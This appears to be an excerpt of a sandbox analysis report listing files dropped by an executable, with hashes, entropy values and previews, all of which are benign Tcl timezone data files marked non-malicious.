                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/2901iZ903GKT:MByMY3GKDp3GKIt290Q903GKT
                                                                                                                                                                                                                              MD5:50434016470AC512A8E2BEBA0BCEBC15
                                                                                                                                                                                                                              SHA1:F3541F6EE201FA33C66042F5C11A26434D37D42C
                                                                                                                                                                                                                              SHA-256:D66E77E6FF789D4D6CA13CDB204B977E1FE64BE9AFEE7B41F2C17ED8217FD025
                                                                                                                                                                                                                              SHA-512:EB1FF97050B7E067DCB68FF7C8F912C8A0C02144BB8E2EAA58C1136C6CC4A2B98C897DD23BB1E9C82D9AF6D028EE45227F97676CB34B6B830CDF5D707B990E57
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:America/Knox_IN) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.9362668992592456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2901Qv090ppv:MByMYbpwt290ev090b
                                                                                                                                                                                                                              MD5:FE9CEC6C50DF451B599B98AE8A434FF7
                                                                                                                                                                                                                              SHA1:60F997825766662B2C5415FBE4D65CEA6D326537
                                                                                                                                                                                                                              SHA-256:5AF9B28C48661FDC81762D249B716BA077F0A40ECF431D34A893BB7EABA57965
                                                                                                                                                                                                                              SHA-512:1311605021871BAFAF321AA48B352262C6BA42149101CCD4FDD4000435B2584AC564E0F76D481BB181767C010FD922BAA4E4EBB401AC2FF27B21874D89332872
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Kralendijk) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):218
                                                                                                                                                                                                                              Entropy (8bit):4.902526230255025
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290WDm2OHphvoHvKZdcyFXmBVVON:MB86290ymdHphvCvKfcyy/ON
                                                                                                                                                                                                                              MD5:3BC04900A19D0152A31B353C6715A97B
                                                                                                                                                                                                                              SHA1:58A6D49E0B6FA00CBEAFD695D604D740AD63C54E
                                                                                                                                                                                                                              SHA-256:5488D98AA3C29D710C6AF92C42ACE36550A5BFF78C155CDF8769EE31F71CF033
                                                                                                                                                                                                                              SHA-512:65302935090F98A81443A1E1158911F57C3A1564564CD401CA72DDBF66D967DB564EF5AE8A4083D83984B9EF55AB53159010EFE2DB5D7A723F7EA61A1795322D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/La_Paz) {.. {-9223372036854775808 -16356 0 LMT}.. {-2524505244 -16356 0 CMT}.. {-1205954844 -12756 1 BST}.. {-1192307244 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):460
                                                                                                                                                                                                                              Entropy (8bit):4.2444415392593875
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290B2mdH4VCvvCOt/Os/OCQXR/uFfC3/O3e/uFbs/OX/OqF/O+8/OOS1F5/D:59etvqOVLOR/uGD/utsg38xSP5r
                                                                                                                                                                                                                              MD5:5F41E848D2DDE91261F45CB577B1B0A9
                                                                                                                                                                                                                              SHA1:DF284499CF57479ADE5E1D3DC01D6DCCF6AFDFE1
                                                                                                                                                                                                                              SHA-256:6E01002F264DF9A6FC247F95399F4F42DCCC7AB890B0C259DE93DCC97DEC89CE
                                                                                                                                                                                                                              SHA-512:2F5472F812734E892182632B8A34A4AD7B342541D0C3F1107BD95FFBE25D9351A0CDF5F58F35A1F37365DDF8A8A5D883C89C3CC40A9AD09D54CA152DC6BE1A09
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Lima) {.. {-9223372036854775808 -18492 0 LMT}.. {-2524503108 -18516 0 LMT}.. {-1938538284 -14400 0 -05}.. {-1002052800 -18000 0 -05}.. {-986756400 -14400 1 -05}.. {-971035200 -18000 0 -05}.. {-955306800 -14400 1 -05}.. {-939585600 -18000 0 -05}.. {512712000 -18000 0 -05}.. {544248000 -18000 0 -05}.. {638942400 -18000 0 -05}.. {765172800 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9726
                                                                                                                                                                                                                              Entropy (8bit):3.8515163794355916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/uX68CWSgG0U9bFzN6IkWq/WHQt/RY4yP:/uX68CWSgGVbGBt/M
                                                                                                                                                                                                                              MD5:4D4F198238E4E76753411896239041C3
                                                                                                                                                                                                                              SHA1:AD41D199DF0B794B5AB7F165C8A141787FAAC9A9
                                                                                                                                                                                                                              SHA-256:DA3F7572F04E6AE78B8F044761E6F48D37EE259A9C1FE15A67072CC64A299FDB
                                                                                                                                                                                                                              SHA-512:BA39D174B73B1D4B09E8AC07291BED0B9658A4330AE50881080F0E37C35BD8A6F55C49F1D649ED1F19CE47002435D8724048759DFC813BF9C2E9B06B581486FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Los_Angeles) {.. {-9223372036854775808 -28378 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-687967140 -25200 1 PDT}.. {-662655600 -28800 0 PST}.. {-620838000 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589388400 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557938800 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526489200 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495039600 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463590000 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431535600 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400086000 -25200 1 PDT}.. {-386780400 -28800 0 PST}.. {-368636400 -25200 1 PDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):228
                                                                                                                                                                                                                              Entropy (8bit):4.911677030377383
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y71PiKp4o2HAIgp1PiKp4BvN/290hp4901PiKp44v:MByMYPyApPydt290P490Pyi
                                                                                                                                                                                                                              MD5:ACE87B25FE5604C83127A9F148A34C8C
                                                                                                                                                                                                                              SHA1:25C8D85B4740C53F40421D0DADCA95225EAB7829
                                                                                                                                                                                                                              SHA-256:F85C1253F4C1D3E85757D3DEA4FD3C61F1AA7BE6BAAE8CB8579278412905ACB2
                                                                                                                                                                                                                              SHA-512:AC0662B19F336474B146E06778E1FB43B941ABC8FD51BDB31B2640C94CCDFBE7659960EF4FD18329AFA7AD11316FC08D3CF33BB27931EA70AA7218667A8D0737
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Kentucky/Louisville)]} {.. LoadTimeZoneFile America/Kentucky/Louisville..}..set TZData(:America/Louisville) $TZData(:America/Kentucky/Louisville)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.900350318979456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290h48h490ppv:MByMYbpwt290/490b
                                                                                                                                                                                                                              MD5:83CE86174ADB5F276AABD26FE132BB55
                                                                                                                                                                                                                              SHA1:925E3F4A5DB1A2C33B3A537C8DBC9CFE309FA340
                                                                                                                                                                                                                              SHA-256:1E786229B84CE86DB6316B24C85F7CF4CFE66011F973053AD0E108BFCC9A9DE2
                                                                                                                                                                                                                              SHA-512:BA2AC5571D772B577735BC8E43FF8023228BC61A974DCCE0EAE20EC9B11FC757E56CABDAE00933A99834108114E598B7EC149BB017EB80BE18301A655F341A36
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Lower_Princes) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1539
                                                                                                                                                                                                                              Entropy (8bit):3.7453889877550512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5QChlvEw6kSSx5H4a8tf3fkuoLdNYVZDNR8nd:OIlvEwJSSxdF8tfMuoLdNYVZJR8nd
                                                                                                                                                                                                                              MD5:EB0EDF4E075E3CF9F8EDF2B689C2FE54
                                                                                                                                                                                                                              SHA1:9713D7E8AA0E7164824657D00DE6C49483D2BD19
                                                                                                                                                                                                                              SHA-256:F65C5957D434A87324AAD35991E7666E426A20C40432540D9A3CB1EEE9141761
                                                                                                                                                                                                                              SHA-512:0A0D1E4E0BD7D854E8F139E6F7A9BBC66422B73F7A6C2E1F1B6D2CA400B24B3D220AB519B6AEAA743443E9A4B748709CDF2C276BF52C5382669B12734A469125
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Maceio) {.. {-9223372036854775808 -8572 0 LMT}.. {-1767217028 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):611
                                                                                                                                                                                                                              Entropy (8bit):4.303621439025158
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290znTjmdHOYCvprv5EU/dLAyW+/uF+kX8/uF+RZ//dAWcP/QAWcx/uF+rbE:5GnPeOdvhxD1pLS+S8S+RVqzo4xS+3SJ
                                                                                                                                                                                                                              MD5:FB09D1F064C30F9E223FA119A8875098
                                                                                                                                                                                                                              SHA1:C66173FEB21761AEA649301D77FBB77ACF3A6FB1
                                                                                                                                                                                                                              SHA-256:F0F0CCE8DE92D848A62B56EF48E01D763B80153C077230C435D464CF1733BA38
                                                                                                                                                                                                                              SHA-512:BC3D841FF48FD0DE7C9ABF5DAE3A42C876BD4D7FBD6684B4513EC7ECC92D938A7133BCC873AD46E453DD1863E843E5C7DD14FFDB41B593E90BEB5CD8F7E66202
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Managua) {.. {-9223372036854775808 -20708 0 LMT}.. {-2524500892 -20712 0 MMT}.. {-1121105688 -21600 0 CST}.. {105084000 -18000 0 EST}.. {161758800 -21600 0 CST}.. {290584800 -18000 1 CDT}.. {299134800 -21600 0 CST}.. {322034400 -18000 1 CDT}.. {330584400 -21600 0 CST}.. {694260000 -18000 0 EST}.. {717310800 -21600 0 CST}.. {725868000 -18000 0 EST}.. {852094800 -21600 0 CST}.. {1113112800 -18000 1 CDT}.. {1128229200 -21600 0 CST}.. {1146384000 -18000 1 CDT}.. {1159682400 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1166
                                                                                                                                                                                                                              Entropy (8bit):3.7842934576858482
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5GnqeKwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQz:5mSeSFESoSQSrSsCSeSPS1cSQSQlSsSQ
                                                                                                                                                                                                                              MD5:E42719A9B0165490BB9E0E899EFB3643
                                                                                                                                                                                                                              SHA1:2991D7EC31F47E32D2C8DB89A0F87D814122DD1B
                                                                                                                                                                                                                              SHA-256:DC54E6D4FE14458B0462FA0E15B960FD4290930ADC0D13453BF49B436ED8C143
                                                                                                                                                                                                                              SHA-512:F75024E27A2D679A667EA70EC948F983C7B823FDA5962DD88697D61147A6C2B1499E58BA8B01170653C4D025900491AE8E21925500DE39EACBAF883F7E62D874
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Manaus) {.. {-9223372036854775808 -14404 0 LMT}.. {-1767211196 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.900738604616686
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zzJ/90ppv:MByMYbpwt290zzN90b
                                                                                                                                                                                                                              MD5:8C60DE8E522FE5D51EACD643FD8EA132
                                                                                                                                                                                                                              SHA1:2E09A71DF340ECA6F7AEBD978070D56A627049EC
                                                                                                                                                                                                                              SHA-256:5C26D7CE93F91CC4F5ED87E9388B1B180EF9D84681044FD23CC01A628A1284CA
                                                                                                                                                                                                                              SHA-512:D2D522D041AFA638542F6FF00F5F40325E3F117C5035BA71F676B4956B054542C67A753055D17E2E2EEA925F13EACC0969D01EC18E40D274D8EA408F92777EA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Marigot) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):251
                                                                                                                                                                                                                              Entropy (8bit):4.849143012086458
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290zlEDm2OHfueoHv9dMIqR5lRfT/VVFUFkmR/lAov:MB86290zimdHfnCv9dMIqR5lVb/uFkmD
                                                                                                                                                                                                                              MD5:CFE10EE56115D3A5F44E047B3661D8ED
                                                                                                                                                                                                                              SHA1:03F598CFC9AEDE2F588339B439B2361F2EBDE34F
                                                                                                                                                                                                                              SHA-256:D411FB42798E93B106275EC0E054F8F3C4E9FB49431C656448739C7F20C46EDE
                                                                                                                                                                                                                              SHA-512:25D6760FDF2F1B0DD91A41D29BDB7048FAE27A03F7B9D9C955ECF4C32E8402836D007B39FE62B93E7BEA017681A0C8AFC1C4CAFD823B0A6C41EDAF09DDF3435D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Martinique) {.. {-9223372036854775808 -14660 0 LMT}.. {-2524506940 -14660 0 FFMT}.. {-1851537340 -14400 0 AST}.. {323841600 -10800 1 ADT}.. {338958000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6745
                                                                                                                                                                                                                              Entropy (8bit):3.8432520851585372
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:aD5NA604qSScBgN+4ctDzIVQ/c/3hNxTh:aDbA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:FC4A24AE95BA6E36285F09AB2FCEE56F
                                                                                                                                                                                                                              SHA1:54ED1CD69247064B5EC775E907790D19E93A4626
                                                                                                                                                                                                                              SHA-256:59C658CEA1BF5392A8F16295A09A74230EFB52EF7BF783E493E9A9C1799036F2
                                                                                                                                                                                                                              SHA-512:2E8E65C487090DC8EE90F8575360A00E74C134CE34E83D4296E2CC32B773F9F0151F4049BFD1BEEAFE7B441E8684AF9FB50287E42FBD5182E4051D1FC39932E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Matamoros) {.. {-9223372036854775808 -23400 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2067
                                                                                                                                                                                                                              Entropy (8bit):3.990817847620547
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5GtXed9WUQwuz/V/NF01YmM/parZ375+XiB+:5sNUIdFS1YrpaV5+yB+
                                                                                                                                                                                                                              MD5:43467194416FCF6F0D67AD2456D78646
                                                                                                                                                                                                                              SHA1:1FDF02EF7354D9DB71F545D32AE52D018E99D801
                                                                                                                                                                                                                              SHA-256:8140084EA9D6A478C34A114D9E216DC05450ECBE4809B2CDA194B40452E2AA0F
                                                                                                                                                                                                                              SHA-512:EB5CD3E95779391F096EE9A7B16920C6C9E8A90F38C7A3CBE2B0E123D088A127C5BBE21F5883DCDAD4FBB2410ED052EDE3D4F1E260483D97FEBB7BA7022874C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mazatlan) {.. {-9223372036854775808 -25540 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -2520
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.812188311941308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MeHAIgp/MSvYovN/290zpH+90/MX:MByMY/M/p/MSA6t290zpe90/MX
                                                                                                                                                                                                                              MD5:2A3BFEEFBB684FB3B420A6B53B588BDC
                                                                                                                                                                                                                              SHA1:CC5C0BB90D847CCBB45688A8DA460AD575D64617
                                                                                                                                                                                                                              SHA-256:D6B308A1619F2DE450DACBFEF0E11B237DF7375A80C90899DD02B827688CB4B8
                                                                                                                                                                                                                              SHA-512:4A35C80D3454E039383FFEB06DC84933B3201BE2487C42A448AF3DA5ABAEEB9882263C011CDD3194E121EC1C31FC80120BF7829F280A79996E376CFA828EE215
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Mendoza)]} {.. LoadTimeZoneFile America/Argentina/Mendoza..}..set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8410
                                                                                                                                                                                                                              Entropy (8bit):3.8311875423131534
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:6quShLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:6lSUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:C74D31382279219F805D2B138C58FBF7
                                                                                                                                                                                                                              SHA1:06E2FED0A3BDF62F3D390A4054B6A2D7C1863DD3
                                                                                                                                                                                                                              SHA-256:B0863F8B66F0848020651B69E7997307D62209259AE653FDC1A0FAFC8E793068
                                                                                                                                                                                                                              SHA-512:7B42CBDC119651E2B2EE8B8F934801D3147A8B72EE060A0D0EA1C0C12CA9ABD03F1A102A85BF8E7424B45620151CE107D16A9173F4AA7597EDB3109840C1B2AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Menominee) {.. {-9223372036854775808 -21027 0 LMT}.. {-2659759773 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-116438400 -18000 1 CDT}.. {-100112400 -21600 0 CST}.. {-21484800 -18000 0 EST}.. {104914800 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200 -18000 1 CDT}.. {278492400 -21600 0 CST}.. {294220800 -18000 1 CDT}.. {309942000 -2160
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1877
                                                                                                                                                                                                                              Entropy (8bit):3.9636871490767147
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5bu36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:1qehpYtj
                                                                                                                                                                                                                              MD5:34909341A29FF048D83B707D12A728A5
                                                                                                                                                                                                                              SHA1:A4D4EC31681DB5F9DA899E20C6789D10827E6D86
                                                                                                                                                                                                                              SHA-256:ADE65ADDEEA027D1BE70DC7C12513B61FDF36289021E66982D527C7FEE2A2D19
                                                                                                                                                                                                                              SHA-512:57EED40425680CE2C05D961D3F21EE2E0D204E1FD6D3DB5F1EF7AC349AA269F9397D4E2121BD13BC3DE34205564FBE009CEEB5ADE4052EA742CBA15A91F5822B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
